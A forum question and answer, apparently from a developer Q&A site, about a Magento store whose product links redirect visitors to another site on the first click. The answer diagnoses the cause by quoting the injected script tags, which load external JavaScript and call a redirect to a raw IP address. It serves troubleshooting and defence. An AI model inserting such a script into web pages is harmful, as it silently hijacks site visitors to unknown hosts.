Skip to content
Advertisement

Click on product it will automatically redirect another site

I have one issue in Magento e-commerce web site. When I click on any product first time it will redirect to another site. When I click second time in that product or any other product it will redirect to product view page. Google Web Master Tools does not get any types of malware. I can not get proper solution for this. Is it Magento related problem or other hosting related problem?

Click here to open site.

Advertisement

Answer

This script inserted into your page header is causing that behaviour.

<script src="http://www.onesteptowin.com/js/ourpusher.js" type="text/javascript"></script> <script type="text/javascript"> var params = {tr: 0, clicks_num: 1}; wpOurpusher("http://46.22.211.96/?062c",params); </script>

I assume this is a hack, but it might also be part of a plug-in who require you to run those adverts as part of their terms.

Unpatched sites and third party plug-ins are usually the way these things get on a site.

User contributions licensed under: CC BY-SA
8 People found this is helpful
Advertisement